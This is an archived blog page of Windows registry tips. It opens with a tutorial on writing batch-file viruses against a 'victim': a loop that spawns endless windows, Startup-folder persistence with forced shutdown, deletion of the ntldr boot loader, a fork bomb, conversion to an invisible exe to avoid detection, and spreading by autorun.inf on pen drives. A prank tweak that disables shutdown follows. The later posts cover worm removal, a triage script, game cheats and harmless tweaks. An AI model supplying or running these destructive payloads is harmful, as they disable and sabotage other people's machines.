Showing posts with label hacking in registry. Show all posts

Sunday, October 31, 2010

How to create Batch file viruses?

What are Batch Files ?

According to Wikipedia, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. In this article I will explain the basics of batch files and develop the approach towards coding your own viruses. Let's begin with a simple example.


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'




We first make a folder/directory 'x', then enter folder 'x', then make a folder 'y' inside folder 'x'.
Now delete the folder 'x'.
Let's do the same thing another way. Copy these three commands into Notepad and save the file as anything.bat



Now just double-click this batch file and the same work will be done: you will get a folder 'x' on your desktop and a folder 'y' inside it. This means the three commands are executed line by line when we run the batch file.

So a batch file is simply a text file containing a series of commands which are executed automatically, line by line, when the batch file is run.

What can batch viruses do ?

They can be used to delete Windows files, format data, steal information, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many more purposes.

Now let's start with some simple code.

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.


:x
start cmd.exe
goto x // infinite loop

This code opens Command Prompt windows in an infinite loop, irritating the victim and affecting performance.

2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note: Files in the Startup folder are started automatically when Windows starts.


Every time the victim starts the computer, the batch file in the Startup folder runs and shuts the computer down immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from the Startup folder.

3. Go to the C drive in Win XP, Tools -> Folder Options -> View.
Now uncheck the option 'Hide operating system files' and check the option 'Show hidden files and folders'. Click Apply.

Now you can see the operating system files. One of them is 'ntldr', the boot loader used to boot Windows.



Let's make a batch file to delete this file from the victim's computer; Windows will not start after that.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After running this batch file, the system will not reboot, and a normal victim would definitely install Windows again.



4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of Windows. It will simply hang Windows. This is known as a 'fork bomb'.



The viruses we just coded -:




 

Note: Most batch viruses are simply undetectable by any antivirus.
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1. The victim can easily read the commands by opening the batch file in Notepad.
2. The Command Prompt screen pops up; it alerts the victim and he can stop it.

To overcome these limitations, we need to convert these batch files into executable files, that is, exe files.

Download this Batch To Exe converter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65
 
After running the converter, open the batch file virus, save it as an exe file, set the visibility mode to 'Invisible application', then just click the Compile button.





You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1. 
 
Open notepad and write


[autorun]
open=anything.bat
Icon=anything.ico

Save the file as ‘autorun.inf’.

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ on the pen drive.

When the victim plugs in the pen drive, autorun.inf will launch anything.bat and the commands in the batch file virus will execute.

Remove REGSVR.EXE and New Folder.exe viruses

Plug a pendrive into a public computer and you will be pestered by the continuously replicating “New Folder.exe” virus or the “regsvr.exe” virus. Hear my story: while I transferred my notes last night (around 600 folders), I was surprised to see that around 450 MB of space was eaten by these self-replicating space eaters! I was running Linux so these were not a concern for me, but when I plugged my pendrive into my virtual machine (Windows XP SP3), it caused multiple problems of explorer corruption and disabling registry tools.
Time for some virus busting, I guess. Here is how you can remove “regsvr.exe” and “new folder.exe” from your computer.

Step 1 - Some Startup Repairs
First of all, boot into safe mode. After you get to your desktop, press F3 or Ctrl + F, search for the “autorun.inf” file on your computer and delete all the subsequent files. In case you are not able to delete them, select all the files and uncheck the “Read Only” option. If you are still not able to delete them, you might want to try out the Unlocker tool to delete the files.
Now go to
start –> run –> type “msconfig”
and press enter.
Go to the startup tab and uncheck “regsvr”, click OK and then click on “Exit without restart”.
Now go to
control panel –> scheduled tasks and delete the “At1” task listed there.
Once done, close all windows.

Step 2 - Changing Configurations
Your registry might be disabled, and you need to activate it again to undo all the malicious changes made by the worm. In order to do that, you need to go to
start –> run –> type “gpedit.msc”
and press enter,
then navigate to
users configuration –> Administrative templates –> systems
Find “prevent access to registry editing tools”, double click it and change the option to disable.
Once done, your Regedit will be enabled. In case your task manager is disabled, you need to enable it.

Step 3 - Registry Edits
Now we have to perform some registry edits to enable our explorer and to remove all instances of the worm from the registry. Go to
start –> run –> type “regedit”
and press enter.
Click on Edit –> Find and search for regsvr.exe. Find and delete all the occurrences of the regsvr.exe virus (don't delete regsvr32.exe, as it's not a virus).
Then navigate to the entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
and modify the entry
Shell = “Explorer.exe regsvr.exe”
to delete the regsvr.exe from it, so that it becomes
Shell = “Explorer.exe”
Once done, close all windows and get ready to delete all virus files.

Step 4 - Deleting Virus Files
The final step is to delete all the virus files on your computer. To do this, press F3 or Ctrl + F and search for regsvr.exe (make sure to search in hidden folders) and delete all “regsvr.exe” and “svchost .exe” files (notice the gap between ‘svchost’ and ‘.exe’; keep in mind you don't delete the legitimate file).
Clean your recycle bin and restart your PC (perform a cold boot).
Voila.. you have cleaned your computer of regsvr.. just make sure to scan your pendrive the next time you plug it in :)
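
The checks from Steps 1, 3 and 4 above, together with the autorun.inf format shown in the earlier pen-drive section, can be scripted for triage. This is an added Python example, not part of the original posts; the function names and sample inputs are constructed for illustration, and the script only inspects text you pass to it (it does not read the registry or any drive).

```python
import re

# File names the post says to delete; regsvr32.exe and svchost.exe are legitimate.
WORM_FILE_NAMES = {"regsvr.exe", "new folder.exe", "svchost .exe"}


def autorun_launch_targets(inf_text):
    """Return (key, command) pairs from the [autorun] section that start a program."""
    targets, section = [], None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()    # section names are case-insensitive
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        # open= and shellexecute= name the program AutoRun starts;
        # shell\<verb>\command adds a context-menu action that runs a command.
        if key in ("open", "shellexecute") or re.fullmatch(r"shell\\[^\\]+\\command", key):
            targets.append((key, value.strip()))
    return targets


def unexpected_shell_entries(shell_value):
    """Return every program in a Winlogon Shell value other than plain explorer.exe.

    Deliberately strict: a full path to explorer.exe is also reported for review.
    """
    tokens = re.split(r"[\s,]+", shell_value.strip().strip('"'))
    return [t for t in tokens if t and t.lower() != "explorer.exe"]


def worm_files(file_names):
    """Return names matching the worm's files exactly (case-insensitive)."""
    return [n for n in file_names if n.lower() in WORM_FILE_NAMES]


# Constructed sample inputs mirroring the values quoted on this page.
SAMPLE_INF = """; constructed sample
[autorun]
open=anything.bat
Icon=anything.ico
shell\\explore\\command=anything.bat
"""
SAMPLE_SHELL = "Explorer.exe regsvr.exe"
SAMPLE_FILES = ["regsvr32.exe", "regsvr.exe", "svchost.exe", "svchost .exe", "New Folder.exe"]

if __name__ == "__main__":
    print(autorun_launch_targets(SAMPLE_INF))
    print(unexpected_shell_entries(SAMPLE_SHELL))
    print(worm_files(SAMPLE_FILES))
```

Any non-empty result is a reason to look closer: a removable drive whose autorun.inf starts a program, a Shell value that loads anything besides Explorer, or a file whose name only imitates a system binary.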

Friday, March 19, 2010

disable shut down

Hey dis is a cool trick u can play on ur friends
u can prevent people from shutting down their computer
jus go to Run type regedit.exe
Scroll Down to this path -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
create a new dword value named NoClose by clicking  Dword Value
Set its Value Data to 1 to disable the shut down option
Have fun

Thursday, October 15, 2009

How to rename recycle bin

You can rename the recycle bin by the following method:


1-Click Start menu > Run > and type “regedit” (without quotes), to run Windows Registry Editor
2- Find and go to following “HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”
3- Change the name "Recycle Bin" to whatever you want

Saturday, July 18, 2009

How to rename ‘My Computer’

In a large organization, it can sometimes be difficult for the administrator to know whose computer is whose. This little tweak will rename My Computer to “Computername” allowing you to easily see which computer you are logged on to.


Open the Registry Editor (you have to use REGEDT32.EXE): click Start, Run, and type “regedt32”, then click OK to start the regedit utility.

Expand HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Rename the value named “LocalizedString” to “LocalizedString.orig”. Create a new REG_EXPAND_SZ value named “LocalizedString”, and set the value to “%COMPUTERNAME%”.

Exit the registry editor, right click on your desktop and click Refresh. The My Computer icon should now be renamed to “Computername”.

Now one only has to glance at the desktop to see what computer they are on

XP/2000: How to Cheat at Freecell

Here’s how to make your freecell stats rock.


Freecell is an addictive solitaire game included in many versions of Windows. It keeps track of your wins and losses.

If you want to pad your stats some, you can cheat for days.

During the game press…

CTRL + SHIFT + F10

This will bring up the cheat window.
Pressing Abort gives you a win.
Pressing Retry gives you a loss.
Pressing Ignore aborts.

XP/2000 Freecell Bonus Games

Two extra freecell games to choose from.

Select ‘Game’ at the top left corner.

And hit ‘Select a game’.

A window will come up saying…

Select a game number 1 to 1000000.

At this point they expect you to type a positive number less than a million, but there are more.

Just type in -1 or -2 and you get bonus games.

They are impossible to beat, but it is pretty cool to look at how they are set up.

How to cheat Window XP 3D Pinball

You need Windows XP version for this to work.


There are four different ways to cheat at this Window’s game.

1. To get one extra ball.
type 1max.

2. To get unlimited balls.
type bmax.

3. Activate the Gravity Well.
type gmax.

4. To get a promotion of one rank.
type rmax.

A message will confirm all of the cheats except for #2, but that one you will notice after you lose a few balls.

How to cheat at Solitaire

Just to get this out in the open… You can use this recipe in the middle of a game, at the beginning or right before the end; timing is not essential for this cheat.

1. You must be playing with Standard scoring or none.

2. Hold Shift + Ctrl + Alt and click on the deck.

3. The effect is that you draw one card, as opposed to three, whenever you click.

4. Enjoy.

XP/2000 Spider Solitaire Cheats

How to edit your score and streaks

1. Go to the start menu and select run.
2. Type in regedit and hit ok.
3. Go to HKEY_CURRENT_USER.
a) look for Microsoft and then spider.
b) hit F3 and search for spider.
4. Look for the following
a) HighScore_(difficulty) = Set the value to set your high scores.
b) StreakCurrent_(difficulty), StreakLosses_(difficulty) and StreakWins_(difficulty) = Edit your streak records.
c) Wins(difficulty) = Edit your winning records.
d) Losses_(difficulty) = Edit your losing records. (difficulty)

XP/2000: Minesweeper cheats

How to rule at this game.

*note will not work in Windows 95 or Windows NT.


Show mines

For this put your cursor inside the minesweeper window

Type XYZZY, then hit Shift+Enter, then Enter again.

This will place a dot in the top left corner of the screen.

To see where mines are put your cursor over a square…

If the dot is white that square is safe.

If the dot is black that square is a mine.

*note to see the dot the top left of your desktop must be visible

XP/2000: Cheat at Hearts.

how to see all cards at Microsoft Hearts.


1. Open start menu

2. Click run

3. Type regedit and hit ok

4. Look for Hkey_Current_User Software……Applets Hearts
(or hit F3 and look for hearts under applets)

Editors Note : Will be something similar to this where the dots are replaced by numbers…
HKEY_USERS\ ... \Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

5. Right-click in the blank area on the right side and select new string value.

6. Title the new string ZB.

7. Right click on the string ZB you just made and hit modify.

8. In value data there should be a 0 , replace it with a 42.

9. Now when playing game, just press CTRL + ALT + SHIFT + F12,
and you will see all cards.

10. Enjoy.

Friday, July 17, 2009

games cheats

The only place for Windows game Cheats



Minesweeper


Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change your desktop background to a solid color other than white or black to see the pixel.



Pinball


Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.


Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.


Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.


Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points


Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.


Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting.




FreeCell


Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.


Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.



Solitaire


Secret - Instant Win


Instructions - Press Alt + Shift + 2 during game play to instantly win.


Secret - Draw single cards in a Draw Three game


Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


Infinite Points


In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II


To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.



//-----------------------------------------------------------------
// registry hack which will allow you to see your opponents' cards
//-----------------------------------------------------------------
Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts. NOTE: You may have to create the Hearts key under Applets. In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

registry file

How to display a legal notice on startup
This is how to make a legal notice appear on startup:

Open Regedit

Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system"

legalnoticecaption:"enter your notice caption here"

legalnoticetext:"enter your legal notice text here"


Add admin user to welcome screen:
Start the Registry Editor Go to:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \

Right-click an empty space in the right pane and select New > DWORD Value. Name the new value Administrator. Double-click this new value, and enter 1 as its Value data. Close the registry editor and restart.



Kill Processes immediately:
When logging off, you sometimes get an “End Task” dialog prompt, indicating a program that doesn’t shut itself down. You can suppress the prompts and have Windows kill these programs automatically when you log off. In regedit, find the key HKEY_CURRENT_USER\Control Panel\Desktop. Look for the value AutoEndTasks, and change it from 0 to 1.



No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"


Show Superhidden Files:
Even if you turn on show hidden files in Windows Explorer some files will remain hidden. These files are super hidden. Set the registry value below to 1.

Wednesday, July 15, 2009

LogIn to Yahoo messenger with multiple Id's

You can log in with multiple IDs on the same Yahoo Messenger. You do not need to download any new software for this; all you have to do is

Follow these steps -

1. Go to Start -> Run. Type "regedit" and then press enter.

2. Navigate to HKEY_CURRENT_USER -> Software -> yahoo -> pager -> Test

3. On the right pane, right-click and choose new Dword value.

4. Rename it as Plural.

5. Double click and assign a decimal value of 1.


That's it, now you're done. Close the registry and you can log in to Yahoo Messenger with multiple IDs.

If your registry is disabled then you have to enable it.

If you have any problem, ask me and I will help you.